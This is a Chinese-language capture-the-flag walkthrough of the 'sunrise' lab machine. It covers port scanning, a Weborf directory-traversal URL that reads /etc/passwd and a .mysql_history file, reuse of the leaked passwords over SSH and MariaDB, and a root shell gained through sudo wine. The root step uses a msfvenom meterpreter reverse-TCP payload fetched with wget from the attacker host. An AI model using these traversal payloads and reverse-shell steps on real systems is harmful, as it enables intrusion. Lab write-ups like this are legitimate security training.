1、找到靶机ip:192.168.0.128
nma -sn 192.168.0.0/24
2、扫描靶机端口
root@kali:~# nmap -p- -A 192.168.0.128
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.128
Host is up (0.00044s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 37:dd:45:a2:9b:e7:bf:aa:30:e3:f0:96:ac:7c:0b:7c (RSA)
| 256 b4:c2:9b:4d:6f:86:67:02:cf:f6:43:8b:e2:64:ea:04 (ECDSA)
|_ 256 cb:f2:e6:cd:e3:e1:0f:bf:ce:e0:a2:3b:84:ae:97:74 (ED25519)
80/tcp open http nginx/1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.0.107' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy Weborf (GNU/Linux)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-methods:
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-server-header: Weborf (GNU/Linux)
|_http-title: Weborf
| http-webdav-scan:
| Server Type: Weborf (GNU/Linux)
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_ WebDAV type: Apache DAV
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.80%I=7%D=7/19%Time=5F140E3F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.0\.107'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.80%I=7%D=7/19%Time=5F140E3E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,187,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\
SF:nContent-Length:\x20326\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Weborf</
SF:title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><
SF:tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20href=
SF:\"html/\">html/</a></td><td>-</td></tr>\n</table><p>Generated\x20by\x20
SF:Weborf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(HTTPOptions,B2,"
SF:HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET
SF:,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV
SF::\x20<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n
SF:\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU
SF:/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,M
SF:OVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/fs/1>\r\n
SF:MS-Author-Via:\x20DAV\r\n\r\n")%r(FourOhFourRequest,12B,"HTTP/1\.1\x204
SF:04\x20Page\x20not\x20found:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Lengt
SF:h:\x20202\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head
SF:><title>Weborf</title></head><body>\x20<H1>Error\x20404</H1>Page\x20not
SF:\x20found\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p>
SF:</body></html>")%r(Socks5,125,"HTTP/1\.1\x20400\x20Bad\x20request:\x20W
SF:eborf\x20\(GNU/Linux\)\r\nContent-Length:\x20199\r\nContent-Type:\x20te
SF:xt/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x20
SF:4\.01\x20Transitional//EN\"><html><head><title>Weborf</title></head><bo
SF:dy>\x20<H1>Error\x20400</H1>Bad\x20request\x20<p>Generated\x20by\x20Web
SF:orf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>");
MAC Address: 08:00:27:5B:26:2C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.0.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds
3、访问80端口,发现是一个默认的nginx服务器首页,根据前面的经验,先放着
4、直接转向8080端口,是运行在weborf0.12.2服务器上,这个从端口扫描的详细信息中也能看出,有一个html目录,里面有一个html文件
百度搜索一下这个服务器的漏洞,发现第一个目录遍历漏洞就是满足这个版本的
文章内有利用方法,先访问/etc/passwd文件,发现有三个系统登录用户:root、sunrise、weborf
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
5、查看两个用户家目录下分别有什么信息
(1)先看一下sunrise的,在家目录下发现一个user.txt文件
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
访问得到第一个flag
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
从遍历sunrise家目录的结果,可以发现没有显示隐藏文件,尝试访问一下.bash_history、.mysql_history文件获取一些信息,但是都没有,怀疑是不是没有显示,是根本没有,访问一下.bash_logout,发现成功获取,成功打消怀疑
(2)查看一下weborf家目录下的文件,就发现一个文件夹
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
还是尝试一下那些隐藏文件,发现.mysql_history里面有信息,修改了mysql登录用户webor的密码为iheartrainbows44
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
尝试远程连接数据库,发现连接不上,应该是禁止远程连接,于是尝试直接拿这个用户名和密码ssh登录,发现成功登录
root@kali:~# mysql -h 192.168.0.128 -u weborf -p
Enter password: iheartrainbows44(不可见)
ERROR 1130 (HY000): Host '192.168.0.107' is not allowed to connect to this MariaDB server
root@kali:~# ssh weborf@192.168.0.128
The authenticity of host '192.168.0.128 (192.168.0.128)' can't be established.
ECDSA key fingerprint is SHA256:4yaOo7mwlBs//3V1VVqqtiApksgelyI4AJwhIUfz0UQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.128' (ECDSA) to the list of known hosts.
weborf@192.168.0.128's password: iheartrainbows44(不可见)
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
weborf@sunrise:~$
6、使用sudo -l命令时显示此用户不能使用sudo命令
weborf@sunrise:~$ sudo -l
[sudo] password for weborf:
Sorry, user weborf may not run sudo on sunrise.
于是本地连接数据库看看有没有有用的信息,先验证一下weborf用户是不是只能本地登录,经查询,发现所有用户都只能本地登录
weborf@sunrise:~$ mysql -uweborf -piheartrainbows44
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 52
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> select user,host from user;
+---------+-----------+
| user | host |
+---------+-----------+
| root | localhost |
| sunrise | localhost |
| weborf | localhost |
+---------+-----------+
3 rows in set (0.000 sec)
接着查看user表的全部信息,发现sunset的密码是明文的
MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N | N | | 0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
| localhost | weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.001 sec)
尝试使用此密码切换到系统用户sunrise,又成功了
MariaDB [mysql]> exit
Bye
weborf@sunrise:~$ su sunrise
Password: thefutureissobrightigottawearshades(不可见)
sunrise@sunrise:/home/weborf$
7、使用sudo -l命令发现可以使用root身份运行wine命令,这个命令就是可以让linux系统运行exe文件
sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise: thefutureissobrightigottawearshades(不可见)
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
使用msfvenom生成木马,使用python开启一个简单的web服务器
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
下载到靶机上,给777权限
sunrise@sunrise:/home/weborf$ cd ~
sunrise@sunrise:~$ wget http://192.168.0.107:8080/shell.exe
Connecting to 192.168.0.107:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘shell.exe’
shell.exe 100%[=====================>] 72.07K --.-KB/s in 0.009s
(7.94 MB/s) - ‘shell.exe’ saved [73802/73802]
msfconsole上开启监听
root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.107
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.107:4444
使用wine运行文件
sunrise@sunrise:~$ sudo wine shell.exe
成功反弹shell
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.107:4444
[*] Sending stage (176195 bytes) to 192.168.0.128
[*] Meterpreter session 1 opened (192.168.0.107:4444 -> 192.168.0.128:39372) at 2020-07-19 18:16:52 +0800
meterpreter >
进入root目录拿到最终flag
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1602 fil 2019-12-06 06:24:31 +0800 .ICEauthority
100666/rw-rw-rw- 104 fil 2019-12-06 06:40:27 +0800 .Xauthority
100666/rw-rw-rw- 96 fil 2019-12-06 06:54:41 +0800 .bash_history
100666/rw-rw-rw- 570 fil 2010-01-31 19:52:26 +0800 .bashrc
40777/rwxrwxrwx 0 dir 2019-12-05 06:46:24 +0800 .cache
40777/rwxrwxrwx 0 dir 2019-12-05 04:48:21 +0800 .config
100666/rw-rw-rw- 35 fil 2019-12-05 04:46:34 +0800 .dmrc
40777/rwxrwxrwx 0 dir 2019-12-05 04:48:12 +0800 .gnupg
40777/rwxrwxrwx 0 dir 2019-12-05 03:29:33 +0800 .local
40777/rwxrwxrwx 0 dir 2019-12-05 06:46:29 +0800 .mozilla
100666/rw-rw-rw- 0 fil 2019-12-05 05:56:11 +0800 .odbc.ini
100666/rw-rw-rw- 148 fil 2015-08-17 23:30:33 +0800 .profile
40777/rwxrwxrwx 0 dir 2019-12-05 03:48:28 +0800 .rpmdb
100666/rw-rw-rw- 66 fil 2019-12-06 05:08:41 +0800 .selected_editor
40777/rwxrwxrwx 0 dir 2019-12-05 04:47:54 +0800 .ssh
100666/rw-rw-rw- 252 fil 2019-12-06 03:59:00 +0800 .wget-hsts
100666/rw-rw-rw- 2211 fil 2019-12-06 06:24:30 +0800 .xsession-errors
100666/rw-rw-rw- 2211 fil 2019-12-06 02:51:40 +0800 .xsession-errors.old
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Desktop
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Documents
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Downloads
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:27 +0800 Groups
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:27 +0800 Logs
40777/rwxrwxrwx 0 dir 2019-12-05 05:33:15 +0800 Manual
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Music
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Pictures
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Public
40777/rwxrwxrwx 0 dir 2019-12-05 05:33:15 +0800 Readme
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Templates
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:26 +0800 Users
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Videos
100666/rw-rw-rw- 701 fil 2019-12-06 06:22:55 +0800 root.txt
meterpreter > cat root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
meterpreter >